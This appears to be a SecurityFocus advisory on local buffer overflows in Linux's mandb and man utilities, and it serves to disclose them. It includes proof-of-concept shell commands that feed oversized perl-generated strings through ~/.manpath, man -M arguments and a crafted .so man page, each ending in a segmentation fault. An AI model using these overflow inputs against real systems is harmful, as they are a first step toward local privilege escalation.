source: http://www.securityfocus.com/bid/8303/info
The mandb utility has been reported to be affected by multiple local buffer overflow vulnerabilities.
These issues present themselves due to insufficient bounds checking performed on user-supplied data before it is copied into reserved buffers in memory. It has been reported that a local attacker may exploit these issues to execute arbitrary instructions in the context of the mandb utility.
# cd /tmp
# mkdir x
# echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath
# mandb
Segmentation fault
(can also apply this to the "man" binary, by fooling it with links)
# cd /tmp
# mkdir x
# ln /usr/bin/man mandb
# echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath
# ./mandb
Segmentation fault
# man -M `perl -e 'print"/"x2100'`usr/share/man ls
...(verbose)
Segmentation fault
# cd /tmp
# mkdir man man/man1
# echo .so `perl -e 'print"x"x1024'` >man/man1/x.1
# man -M /tmp/man x
...(verbose)
Segmentation fault
# man -M `perl -e 'print"/tmp:"x260'` x
Segmentation fault
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